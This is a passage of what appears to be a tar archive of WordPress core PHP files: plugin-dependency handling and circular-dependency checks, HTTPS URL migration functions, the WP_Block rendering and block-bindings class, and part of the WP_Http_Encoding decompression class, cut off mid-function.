// Set transient for individual data, remove from self::$dependency_api_data if transient expired.
if ( ! get_site_transient( "wp_plugin_dependencies_plugin_timeout_{$slug}" ) ) {
unset( self::$dependency_api_data[ $slug ] );
set_site_transient( "wp_plugin_dependencies_plugin_timeout_{$slug}", true, 12 * HOUR_IN_SECONDS );
}
if ( isset( self::$dependency_api_data[ $slug ] ) ) {
if ( false === self::$dependency_api_data[ $slug ] ) {
$dependency_file = self::get_dependency_filepath( $slug );
if ( false === $dependency_file ) {
self::$dependency_api_data[ $slug ] = array( 'Name' => $slug );
} else {
self::$dependency_api_data[ $slug ] = array( 'Name' => $plugins[ $dependency_file ]['Name'] );
}
continue;
}
// Don't hit the Plugin API if data exists.
if ( ! empty( self::$dependency_api_data[ $slug ]['last_updated'] ) ) {
continue;
}
}
if ( ! function_exists( 'plugins_api' ) ) {
require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
}
$information = plugins_api(
'plugin_information',
array(
'slug' => $slug,
'fields' => array(
'short_description' => true,
'icons' => true,
),
)
);
if ( is_wp_error( $information ) ) {
continue;
}
self::$dependency_api_data[ $slug ] = (array) $information;
// plugins_api() returns 'name' not 'Name'.
self::$dependency_api_data[ $slug ]['Name'] = self::$dependency_api_data[ $slug ]['name'];
set_site_transient( 'wp_plugin_dependencies_plugin_data', self::$dependency_api_data, 0 );
}
// Remove from self::$dependency_api_data if slug no longer a dependency.
$differences = array_diff( array_keys( self::$dependency_api_data ), self::$dependency_slugs );
foreach ( $differences as $difference ) {
unset( self::$dependency_api_data[ $difference ] );
}
ksort( self::$dependency_api_data );
// Remove empty elements.
self::$dependency_api_data = array_filter( self::$dependency_api_data );
set_site_transient( 'wp_plugin_dependencies_plugin_data', self::$dependency_api_data, 0 );
return self::$dependency_api_data;
}
/**
* Gets plugin directory names.
*
* @since 6.5.0
*
* @return array An array of plugin directory names.
*/
protected static function get_plugin_dirnames() {
if ( is_array( self::$plugin_dirnames ) ) {
return self::$plugin_dirnames;
}
self::$plugin_dirnames = array();
$plugin_files = array_keys( self::get_plugins() );
foreach ( $plugin_files as $plugin_file ) {
$slug = self::convert_to_slug( $plugin_file );
self::$plugin_dirnames[ $slug ] = $plugin_file;
}
return self::$plugin_dirnames;
}
/**
* Gets circular dependency data.
*
* @since 6.5.0
*
* @return array[] An array of circular dependency pairings.
*/
protected static function get_circular_dependencies() {
if ( is_array( self::$circular_dependencies_pairs ) ) {
return self::$circular_dependencies_pairs;
}
if ( null === self::$dependencies ) {
return array();
}
self::$circular_dependencies_slugs = array();
self::$circular_dependencies_pairs = array();
foreach ( self::$dependencies as $dependent => $dependencies ) {
/*
* $dependent is in 'a/a.php' format. Dependencies are stored as slugs, i.e. 'a'.
*
* Convert $dependent to slug format for checking.
*/
$dependent_slug = self::convert_to_slug( $dependent );
self::$circular_dependencies_pairs = array_merge(
self::$circular_dependencies_pairs,
self::check_for_circular_dependencies( array( $dependent_slug ), $dependencies )
);
}
return self::$circular_dependencies_pairs;
}
/**
* Checks for circular dependencies.
*
* @since 6.5.0
*
* @param array $dependents Array of dependent plugins.
* @param array $dependencies Array of plugins dependencies.
* @return array A circular dependency pairing, or an empty array if none exists.
*/
protected static function check_for_circular_dependencies( $dependents, $dependencies ) {
$circular_dependencies_pairs = array();
// Check for a self-dependency.
$dependents_location_in_its_own_dependencies = array_intersect( $dependents, $dependencies );
if ( ! empty( $dependents_location_in_its_own_dependencies ) ) {
foreach ( $dependents_location_in_its_own_dependencies as $self_dependency ) {
self::$circular_dependencies_slugs[] = $self_dependency;
$circular_dependencies_pairs[] = array( $self_dependency, $self_dependency );
// No need to check for itself again.
unset( $dependencies[ array_search( $self_dependency, $dependencies, true ) ] );
}
}
/*
* Check each dependency to see:
* 1. If it has dependencies.
* 2. If its list of dependencies includes one of its own dependents.
*/
foreach ( $dependencies as $dependency ) {
// Check if the dependency is also a dependent.
$dependency_location_in_dependents = array_search( $dependency, self::$dependent_slugs, true );
if ( false !== $dependency_location_in_dependents ) {
$dependencies_of_the_dependency = self::$dependencies[ $dependency_location_in_dependents ];
foreach ( $dependents as $dependent ) {
// Check if its dependencies includes one of its own dependents.
$dependent_location_in_dependency_dependencies = array_search(
$dependent,
$dependencies_of_the_dependency,
true
);
if ( false !== $dependent_location_in_dependency_dependencies ) {
self::$circular_dependencies_slugs[] = $dependent;
self::$circular_dependencies_slugs[] = $dependency;
$circular_dependencies_pairs[] = array( $dependent, $dependency );
// Remove the dependent from its dependency's dependencies.
unset( $dependencies_of_the_dependency[ $dependent_location_in_dependency_dependencies ] );
}
}
$dependents[] = $dependency;
/*
* Now check the dependencies of the dependency's dependencies for the dependent.
*
* Yes, that does make sense.
*/
$circular_dependencies_pairs = array_merge(
$circular_dependencies_pairs,
self::check_for_circular_dependencies( $dependents, array_unique( $dependencies_of_the_dependency ) )
);
}
}
return $circular_dependencies_pairs;
}
/**
* Converts a plugin filepath to a slug.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return string The plugin's slug.
*/
protected static function convert_to_slug( $plugin_file ) {
if ( 'hello.php' === $plugin_file ) {
return 'hello-dolly';
}
return str_contains( $plugin_file, '/' ) ? dirname( $plugin_file ) : str_replace( '.php', '', $plugin_file );
}
}
https-migration-20260606042005.php 0000666 00000011205 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-block-20260621182519.php 0000666 00000060354 15224151220 0011476 0 ustar 00 <?php
/**
* Blocks API: WP_Block class
*
* @package WordPress
* @since 5.5.0
*/
/**
* Class representing a parsed instance of a block.
*
* @since 5.5.0
* @property array $attributes
*/
#[AllowDynamicProperties]
class WP_Block {
/**
* Original parsed array representation of block.
*
* @since 5.5.0
* @var array
*/
public $parsed_block;
/**
* Name of block.
*
* @example "core/paragraph"
*
* @since 5.5.0
* @var string|null
*/
public $name;
/**
* Block type associated with the instance.
*
* @since 5.5.0
* @var WP_Block_Type
*/
public $block_type;
/**
* Block context values.
*
* @since 5.5.0
* @var array
*/
public $context = array();
/**
* All available context of the current hierarchy.
*
* @since 5.5.0
* @var array
*/
protected $available_context = array();
/**
* Block type registry.
*
* @since 5.9.0
* @var WP_Block_Type_Registry
*/
protected $registry;
/**
* List of inner blocks (of this same class)
*
* @since 5.5.0
* @var WP_Block_List
*/
public $inner_blocks = array();
/**
* Resultant HTML from inside block comment delimiters after removing inner
* blocks.
*
* @example "...Just <!-- wp:test /--> testing..." -> "Just testing..."
*
* @since 5.5.0
* @var string
*/
public $inner_html = '';
/**
* List of string fragments and null markers where inner blocks were found
*
* @example array(
* 'inner_html' => 'BeforeInnerAfter',
* 'inner_blocks' => array( block, block ),
* 'inner_content' => array( 'Before', null, 'Inner', null, 'After' ),
* )
*
* @since 5.5.0
* @var array
*/
public $inner_content = array();
/**
* Constructor.
*
* Populates object properties from the provided block instance argument.
*
* The given array of context values will not necessarily be available on
* the instance itself, but is treated as the full set of values provided by
* the block's ancestry. This is assigned to the private `available_context`
* property. Only values which are configured to consumed by the block via
* its registered type will be assigned to the block's `context` property.
*
* @since 5.5.0
*
* @param array $block {
* An associative array of a single parsed block object. See WP_Block_Parser_Block.
*
* @type string|null $blockName Name of block.
* @type array $attrs Attributes from block comment delimiters.
* @type array $innerBlocks List of inner blocks. An array of arrays that
* have the same structure as this one.
* @type string $innerHTML HTML from inside block comment delimiters.
* @type array $innerContent List of string fragments and null markers where inner blocks were found.
* }
* @param array $available_context Optional array of ancestry context values.
* @param WP_Block_Type_Registry $registry Optional block type registry.
*/
public function __construct( $block, $available_context = array(), $registry = null ) {
$this->parsed_block = $block;
$this->name = $block['blockName'];
if ( is_null( $registry ) ) {
$registry = WP_Block_Type_Registry::get_instance();
}
$this->registry = $registry;
$this->block_type = $registry->get_registered( $this->name );
$this->available_context = $available_context;
$this->refresh_context_dependents();
}
/**
* Updates the context for the current block and its inner blocks.
*
* The method updates the context of inner blocks, if any, by passing down
* any context values the block provides (`provides_context`).
*
* If the block has inner blocks, the method recursively processes them by creating new instances of `WP_Block`
* for each inner block and updating their context based on the block's `provides_context` property.
*
* @since 6.8.0
*/
public function refresh_context_dependents() {
/*
* Merging the `$context` property here is not ideal, but for now needs to happen because of backward compatibility.
* Ideally, the `$context` property itself would not be filterable directly and only the `$available_context` would be filterable.
* However, this needs to be separately explored whether it's possible without breakage.
*/
$this->available_context = array_merge( $this->available_context, $this->context );
if ( ! empty( $this->block_type->uses_context ) ) {
foreach ( $this->block_type->uses_context as $context_name ) {
if ( array_key_exists( $context_name, $this->available_context ) ) {
$this->context[ $context_name ] = $this->available_context[ $context_name ];
}
}
}
$this->refresh_parsed_block_dependents();
}
/**
* Updates the parsed block content for the current block and its inner blocks.
*
* This method sets the `inner_html` and `inner_content` properties of the block based on the parsed
* block content provided during initialization. It ensures that the block instance reflects the
* most up-to-date content for both the inner HTML and any string fragments around inner blocks.
*
* If the block has inner blocks, this method initializes a new `WP_Block_List` for them, ensuring the
* correct content and context are updated for each nested block.
*
* @since 6.8.0
*/
public function refresh_parsed_block_dependents() {
if ( ! empty( $this->parsed_block['innerBlocks'] ) ) {
$child_context = $this->available_context;
if ( ! empty( $this->block_type->provides_context ) ) {
foreach ( $this->block_type->provides_context as $context_name => $attribute_name ) {
if ( array_key_exists( $attribute_name, $this->attributes ) ) {
$child_context[ $context_name ] = $this->attributes[ $attribute_name ];
}
}
}
$this->inner_blocks = new WP_Block_List( $this->parsed_block['innerBlocks'], $child_context, $this->registry );
}
if ( ! empty( $this->parsed_block['innerHTML'] ) ) {
$this->inner_html = $this->parsed_block['innerHTML'];
}
if ( ! empty( $this->parsed_block['innerContent'] ) ) {
$this->inner_content = $this->parsed_block['innerContent'];
}
}
/**
* Returns a value from an inaccessible property.
*
* This is used to lazily initialize the `attributes` property of a block,
* such that it is only prepared with default attributes at the time that
* the property is accessed. For all other inaccessible properties, a `null`
* value is returned.
*
* @since 5.5.0
*
* @param string $name Property name.
* @return array|null Prepared attributes, or null.
*/
public function __get( $name ) {
if ( 'attributes' === $name ) {
$this->attributes = isset( $this->parsed_block['attrs'] ) ?
$this->parsed_block['attrs'] :
array();
if ( ! is_null( $this->block_type ) ) {
$this->attributes = $this->block_type->prepare_attributes_for_render( $this->attributes );
}
return $this->attributes;
}
return null;
}
/**
* Processes the block bindings and updates the block attributes with the values from the sources.
*
* A block might contain bindings in its attributes. Bindings are mappings
* between an attribute of the block and a source. A "source" is a function
* registered with `register_block_bindings_source()` that defines how to
* retrieve a value from outside the block, e.g. from post meta.
*
* This function will process those bindings and update the block's attributes
* with the values coming from the bindings.
*
* ### Example
*
* The "bindings" property for an Image block might look like this:
*
* ```json
* {
* "metadata": {
* "bindings": {
* "title": {
* "source": "core/post-meta",
* "args": { "key": "text_custom_field" }
* },
* "url": {
* "source": "core/post-meta",
* "args": { "key": "url_custom_field" }
* }
* }
* }
* }
* ```
*
* The above example will replace the `title` and `url` attributes of the Image
* block with the values of the `text_custom_field` and `url_custom_field` post meta.
*
* @since 6.5.0
* @since 6.6.0 Handle the `__default` attribute for pattern overrides.
* @since 6.7.0 Return any updated bindings metadata in the computed attributes.
*
* @return array The computed block attributes for the provided block bindings.
*/
private function process_block_bindings() {
$block_type = $this->name;
$parsed_block = $this->parsed_block;
$computed_attributes = array();
$supported_block_attributes = get_block_bindings_supported_attributes( $block_type );
// If the block doesn't have the bindings property, isn't one of the supported
// block types, or the bindings property is not an array, return the block content.
if (
empty( $supported_block_attributes ) ||
empty( $parsed_block['attrs']['metadata']['bindings'] ) ||
! is_array( $parsed_block['attrs']['metadata']['bindings'] )
) {
return $computed_attributes;
}
$bindings = $parsed_block['attrs']['metadata']['bindings'];
/*
* If the default binding is set for pattern overrides, replace it
* with a pattern override binding for all supported attributes.
*/
if (
isset( $bindings['__default']['source'] ) &&
'core/pattern-overrides' === $bindings['__default']['source']
) {
$updated_bindings = array();
/*
* Build a binding array of all supported attributes.
* Note that this also omits the `__default` attribute from the
* resulting array.
*/
foreach ( $supported_block_attributes as $attribute_name ) {
// Retain any non-pattern override bindings that might be present.
$updated_bindings[ $attribute_name ] = isset( $bindings[ $attribute_name ] )
? $bindings[ $attribute_name ]
: array( 'source' => 'core/pattern-overrides' );
}
$bindings = $updated_bindings;
/*
* Update the bindings metadata of the computed attributes.
* This ensures the block receives the expanded __default binding metadata when it renders.
*/
$computed_attributes['metadata'] = array_merge(
$parsed_block['attrs']['metadata'],
array( 'bindings' => $bindings )
);
}
foreach ( $bindings as $attribute_name => $block_binding ) {
// If the attribute is not in the supported list, process next attribute.
if ( ! in_array( $attribute_name, $supported_block_attributes, true ) ) {
continue;
}
// If no source is provided, or that source is not registered, process next attribute.
if ( ! isset( $block_binding['source'] ) || ! is_string( $block_binding['source'] ) ) {
continue;
}
$block_binding_source = get_block_bindings_source( $block_binding['source'] );
if ( null === $block_binding_source ) {
continue;
}
// Adds the necessary context defined by the source.
if ( ! empty( $block_binding_source->uses_context ) ) {
foreach ( $block_binding_source->uses_context as $context_name ) {
if ( array_key_exists( $context_name, $this->available_context ) ) {
$this->context[ $context_name ] = $this->available_context[ $context_name ];
}
}
}
$source_args = ! empty( $block_binding['args'] ) && is_array( $block_binding['args'] ) ? $block_binding['args'] : array();
$source_value = $block_binding_source->get_value( $source_args, $this, $attribute_name );
// If the value is not null, process the HTML based on the block and the attribute.
if ( ! is_null( $source_value ) ) {
$computed_attributes[ $attribute_name ] = $source_value;
}
}
return $computed_attributes;
}
/**
* Depending on the block attribute name, replace its value in the HTML based on the value provided.
*
* @since 6.5.0
*
* @param string $block_content Block content.
* @param string $attribute_name The attribute name to replace.
* @param mixed $source_value The value used to replace in the HTML.
* @return string The modified block content.
*/
private function replace_html( string $block_content, string $attribute_name, $source_value ) {
$block_type = $this->block_type;
if ( ! isset( $block_type->attributes[ $attribute_name ]['source'] ) ) {
return $block_content;
}
// Depending on the attribute source, the processing will be different.
switch ( $block_type->attributes[ $attribute_name ]['source'] ) {
case 'html':
case 'rich-text':
$block_reader = self::get_block_bindings_processor( $block_content );
// TODO: Support for CSS selectors whenever they are ready in the HTML API.
// In the meantime, support comma-separated selectors by exploding them into an array.
$selectors = explode( ',', $block_type->attributes[ $attribute_name ]['selector'] );
// Add a bookmark to the first tag to be able to iterate over the selectors.
$block_reader->next_tag();
$block_reader->set_bookmark( 'iterate-selectors' );
foreach ( $selectors as $selector ) {
// If the parent tag, or any of its children, matches the selector, replace the HTML.
if ( strcasecmp( $block_reader->get_tag(), $selector ) === 0 || $block_reader->next_tag(
array(
'tag_name' => $selector,
)
) ) {
// TODO: Use `WP_HTML_Processor::set_inner_html` method once it's available.
$block_reader->release_bookmark( 'iterate-selectors' );
$block_reader->replace_rich_text( wp_kses_post( $source_value ) );
return $block_reader->get_updated_html();
} else {
$block_reader->seek( 'iterate-selectors' );
}
}
$block_reader->release_bookmark( 'iterate-selectors' );
return $block_content;
case 'attribute':
$amended_content = new WP_HTML_Tag_Processor( $block_content );
if ( ! $amended_content->next_tag(
array(
// TODO: build the query from CSS selector.
'tag_name' => $block_type->attributes[ $attribute_name ]['selector'],
)
) ) {
return $block_content;
}
$amended_content->set_attribute( $block_type->attributes[ $attribute_name ]['attribute'], $source_value );
return $amended_content->get_updated_html();
default:
return $block_content;
}
}
private static function get_block_bindings_processor( string $block_content ) {
$internal_processor_class = new class('', WP_HTML_Processor::CONSTRUCTOR_UNLOCK_CODE) extends WP_HTML_Processor {
/**
* Replace the rich text content between a tag opener and matching closer.
*
* When stopped on a tag opener, replace the content enclosed by it and its
* matching closer with the provided rich text.
*
* @param string $rich_text The rich text to replace the original content with.
* @return bool True on success.
*/
public function replace_rich_text( $rich_text ) {
if ( $this->is_tag_closer() || ! $this->expects_closer() ) {
return false;
}
$depth = $this->get_current_depth();
$tag_name = $this->get_tag();
$this->set_bookmark( '_wp_block_bindings' );
// The bookmark names are prefixed with `_` so the key below has an extra `_`.
$tag_opener = $this->bookmarks['__wp_block_bindings'];
$start = $tag_opener->start + $tag_opener->length;
// Find matching tag closer.
while ( $this->next_token() && $this->get_current_depth() >= $depth ) {
}
if ( ! $this->is_tag_closer() || $tag_name !== $this->get_tag() ) {
return false;
}
$this->set_bookmark( '_wp_block_bindings' );
$tag_closer = $this->bookmarks['__wp_block_bindings'];
$end = $tag_closer->start;
$this->lexical_updates[] = new WP_HTML_Text_Replacement(
$start,
$end - $start,
$rich_text
);
return true;
}
};
return $internal_processor_class::create_fragment( $block_content );
}
/**
* Generates the render output for the block.
*
* @since 5.5.0
* @since 6.5.0 Added block bindings processing.
*
* @global WP_Post $post Global post object.
*
* @param array $options {
* Optional options object.
*
* @type bool $dynamic Defaults to 'true'. Optionally set to false to avoid using the block's render_callback.
* }
* @return string Rendered block output.
*/
public function render( $options = array() ) {
global $post;
$before_wp_enqueue_scripts_count = did_action( 'wp_enqueue_scripts' );
// Capture the current assets queues.
$before_styles_queue = wp_styles()->queue;
$before_scripts_queue = wp_scripts()->queue;
$before_script_modules_queue = wp_script_modules()->get_queue();
/*
* There can be only one root interactive block at a time because the rendered HTML of that block contains
* the rendered HTML of all its inner blocks, including any interactive block.
*/
static $root_interactive_block = null;
/**
* Filters whether Interactivity API should process directives.
*
* @since 6.6.0
*
* @param bool $enabled Whether the directives processing is enabled.
*/
$interactivity_process_directives_enabled = apply_filters( 'interactivity_process_directives', true );
if (
$interactivity_process_directives_enabled && null === $root_interactive_block && (
( isset( $this->block_type->supports['interactivity'] ) && true === $this->block_type->supports['interactivity'] ) ||
! empty( $this->block_type->supports['interactivity']['interactive'] )
)
) {
$root_interactive_block = $this;
}
$options = wp_parse_args(
$options,
array(
'dynamic' => true,
)
);
// Process the block bindings and get attributes updated with the values from the sources.
$computed_attributes = $this->process_block_bindings();
if ( ! empty( $computed_attributes ) ) {
// Merge the computed attributes with the original attributes.
$this->attributes = array_merge( $this->attributes, $computed_attributes );
}
$is_dynamic = $options['dynamic'] && $this->name && null !== $this->block_type && $this->block_type->is_dynamic();
$block_content = '';
if ( ! $options['dynamic'] || empty( $this->block_type->skip_inner_blocks ) ) {
$index = 0;
foreach ( $this->inner_content as $chunk ) {
if ( is_string( $chunk ) ) {
$block_content .= $chunk;
} else {
$inner_block = $this->inner_blocks[ $index ];
$parent_block = $this;
/** This filter is documented in wp-includes/blocks.php */
$pre_render = apply_filters( 'pre_render_block', null, $inner_block->parsed_block, $parent_block );
if ( ! is_null( $pre_render ) ) {
$block_content .= $pre_render;
} else {
$source_block = $inner_block->parsed_block;
$inner_block_context = $inner_block->context;
/** This filter is documented in wp-includes/blocks.php */
$inner_block->parsed_block = apply_filters( 'render_block_data', $inner_block->parsed_block, $source_block, $parent_block );
/** This filter is documented in wp-includes/blocks.php */
$inner_block->context = apply_filters( 'render_block_context', $inner_block->context, $inner_block->parsed_block, $parent_block );
/*
* The `refresh_context_dependents()` method already calls `refresh_parsed_block_dependents()`.
* Therefore the second condition is irrelevant if the first one is satisfied.
*/
if ( $inner_block->context !== $inner_block_context ) {
$inner_block->refresh_context_dependents();
} elseif ( $inner_block->parsed_block !== $source_block ) {
$inner_block->refresh_parsed_block_dependents();
}
$block_content .= $inner_block->render();
}
++$index;
}
}
}
if ( ! empty( $computed_attributes ) && ! empty( $block_content ) ) {
foreach ( $computed_attributes as $attribute_name => $source_value ) {
$block_content = $this->replace_html( $block_content, $attribute_name, $source_value );
}
}
if ( $is_dynamic ) {
$global_post = $post;
$parent = WP_Block_Supports::$block_to_render;
WP_Block_Supports::$block_to_render = $this->parsed_block;
$block_content = (string) call_user_func( $this->block_type->render_callback, $this->attributes, $block_content, $this );
WP_Block_Supports::$block_to_render = $parent;
$post = $global_post;
}
if ( ( ! empty( $this->block_type->script_handles ) ) ) {
foreach ( $this->block_type->script_handles as $script_handle ) {
wp_enqueue_script( $script_handle );
}
}
if ( ! empty( $this->block_type->view_script_handles ) ) {
foreach ( $this->block_type->view_script_handles as $view_script_handle ) {
wp_enqueue_script( $view_script_handle );
}
}
if ( ! empty( $this->block_type->view_script_module_ids ) ) {
foreach ( $this->block_type->view_script_module_ids as $view_script_module_id ) {
wp_enqueue_script_module( $view_script_module_id );
}
}
/*
* For Core blocks, these styles are only enqueued if `wp_should_load_separate_core_block_assets()` returns
* true. Otherwise these `wp_enqueue_style()` calls will not have any effect, as the Core blocks are relying on
* the combined 'wp-block-library' stylesheet instead, which is unconditionally enqueued.
*/
if ( ( ! empty( $this->block_type->style_handles ) ) ) {
foreach ( $this->block_type->style_handles as $style_handle ) {
wp_enqueue_style( $style_handle );
}
}
if ( ( ! empty( $this->block_type->view_style_handles ) ) ) {
foreach ( $this->block_type->view_style_handles as $view_style_handle ) {
wp_enqueue_style( $view_style_handle );
}
}
/**
* Filters the content of a single block.
*
* @since 5.0.0
* @since 5.9.0 The `$instance` parameter was added.
*
* @param string $block_content The block content.
* @param array $block The full block, including name and attributes.
* @param WP_Block $instance The block instance.
*/
$block_content = apply_filters( 'render_block', $block_content, $this->parsed_block, $this );
/**
* Filters the content of a single block.
*
* The dynamic portion of the hook name, `$name`, refers to
* the block name, e.g. "core/paragraph".
*
* @since 5.7.0
* @since 5.9.0 The `$instance` parameter was added.
*
* @param string $block_content The block content.
* @param array $block The full block, including name and attributes.
* @param WP_Block $instance The block instance.
*/
$block_content = apply_filters( "render_block_{$this->name}", $block_content, $this->parsed_block, $this );
if ( $root_interactive_block === $this ) {
// The root interactive block has finished rendering. Time to process directives.
$block_content = wp_interactivity_process_directives( $block_content );
$root_interactive_block = null;
}
// Capture the new assets enqueued during rendering, and restore the queues the state prior to rendering.
$after_styles_queue = wp_styles()->queue;
$after_scripts_queue = wp_scripts()->queue;
$after_script_modules_queue = wp_script_modules()->get_queue();
/*
* As a very special case, a dynamic block may in fact include a call to wp_head() (and thus wp_enqueue_scripts()),
* in which all of its enqueued assets are targeting wp_footer. In this case, nothing would be printed, but this
* shouldn't indicate that the just-enqueued assets should be dequeued due to it being an empty block.
*/
$just_did_wp_enqueue_scripts = ( did_action( 'wp_enqueue_scripts' ) !== $before_wp_enqueue_scripts_count );
$has_new_styles = ( $before_styles_queue !== $after_styles_queue );
$has_new_scripts = ( $before_scripts_queue !== $after_scripts_queue );
$has_new_script_modules = ( $before_script_modules_queue !== $after_script_modules_queue );
// Dequeue the newly enqueued assets with the existing assets if the rendered block was empty & wp_enqueue_scripts did not fire.
if (
! $just_did_wp_enqueue_scripts &&
( $has_new_styles || $has_new_scripts || $has_new_script_modules ) &&
(
trim( $block_content ) === '' &&
/**
* Filters whether to enqueue assets for a block which has no rendered content.
*
* @since 6.9.0
*
* @param bool $enqueue Whether to enqueue assets.
* @param string $block_name Block name.
*/
! (bool) apply_filters( 'enqueue_empty_block_content_assets', false, $this->name )
)
) {
foreach ( array_diff( $after_styles_queue, $before_styles_queue ) as $handle ) {
wp_dequeue_style( $handle );
}
foreach ( array_diff( $after_scripts_queue, $before_scripts_queue ) as $handle ) {
wp_dequeue_script( $handle );
}
foreach ( array_diff( $after_script_modules_queue, $before_script_modules_queue ) as $handle ) {
wp_dequeue_script_module( $handle );
}
}
return $block_content;
}
}
class-wp-http-encoding-20260605082607.php 0000666 00000015041 15224151220 0013137 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Encoding class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to implement deflate and gzip transfer encoding support for HTTP requests.
*
* Includes RFC 1950, RFC 1951, and RFC 1952.
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_Http_Encoding {
/**
* Compress raw string using the deflate format.
*
* Supports the RFC 1951 standard.
*
* @since 2.8.0
*
* @param string $raw String to compress.
* @param int $level Optional. Compression level, 9 is highest. Default 9.
* @param string $supports Optional, not used. When implemented it will choose
* the right compression based on what the server supports.
* @return string|false Compressed string on success, false on failure.
*/
public static function compress( $raw, $level = 9, $supports = null ) {
return gzdeflate( $raw, $level );
}
/**
* Decompression of deflated string.
*
* Will attempt to decompress using the RFC 1950 standard, and if that fails
* then the RFC 1951 standard deflate will be attempted. Finally, the RFC
* 1952 standard gzip decode will be attempted. If all fail, then the
* original compressed string will be returned.
*
* @since 2.8.0
*
* @param string $compressed String to decompress.
* @param int $length The optional length of the compressed data.
* @return string|false Decompressed string on success, false on failure.
*/
public static function decompress( $compressed, $length = null ) {
if ( empty( $compressed ) ) {
return $compressed;
}
$decompressed = @gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = self::compatible_gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = @gzuncompress( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
if ( function_exists( 'gzdecode' ) ) {
$decompressed = @gzdecode( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
}
return $compressed;
}
/**
* Decompression of deflated string while staying compatible with the majority of servers.
*
* Certain Servers will return deflated data with headers which PHP's gzinflate()
* function cannot handle out of the box. The following function has been created from
* various snippets on the gzinflate() PHP documentation.
*
* Warning: Magic numbers within. Due to the potential different formats that the compressed
* data may be returned in, some "magic offsets" are needed to ensure proper decompression
* takes place. For a simple pragmatic way to determine the magic offset in use, see:
* https://core.trac.wordpress.org/ticket/18273
*
* @since 2.8.1
*
* @link https://core.trac.wordpress.org/ticket/18273
* @link https://www.php.net/manual/en/function.gzinflate.php#70875
* @link https://www.php.net/manual/en/function.gzinflate.php#77336
*
* @param string $gz_data String to decompress.
* @return string|false Decompressed string on success, false on failure.
*/
public static function compatible_gzinflate( $gz_data ) {
// Compressed data might contain a full header, if so strip it for gzinflate().
if ( str_starts_with( $gz_data, "\x1f\x8b\x08" ) ) {
$i = 10;
$flg = ord( substr( $gz_data, 3, 1 ) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack( 'v', substr( $gz_data, $i, 2 ) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 16 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 2 ) {
$i = $i + 2;
}
}
$decompressed = @gzinflate( substr( $gz_data, $i, -8 ) );
